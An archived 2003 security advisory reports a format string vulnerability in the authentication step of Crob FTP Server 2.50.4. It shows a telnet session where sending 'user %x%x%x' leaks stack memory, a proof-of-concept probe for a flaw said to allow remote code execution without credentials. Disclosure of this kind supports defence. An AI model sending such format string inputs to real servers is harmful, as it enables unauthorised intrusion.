Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: 2 Jun 2003 16:55:10 -0000
From: Luca Ercoli <[email protected]>
To: [email protected]
Subject: Format String Vulnerability in Crob Ftp Server



Package:        Crob Ftp Server
Auth:		Crob Software Studio (www.crob.net/studio/ftpserver/)
Version: 	2.50.4 Build 228
Vulnerability:  Format String
Risk: 	        High


Vulnerability
Description:

A format string flaw in the authentication process allows remote attackers 
without valid user/pass to execute arbitrary code.


C:\>telnet 192.168.0.1 21

220- Crob FTP Server V2.50.4
220  Welcome to Crob FTP Server

user %x%x%x

331 Password required for 0d1250b70







Luca Ercoli luca.ercoli[at]inwind.it

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Партнёры:

Хостинг: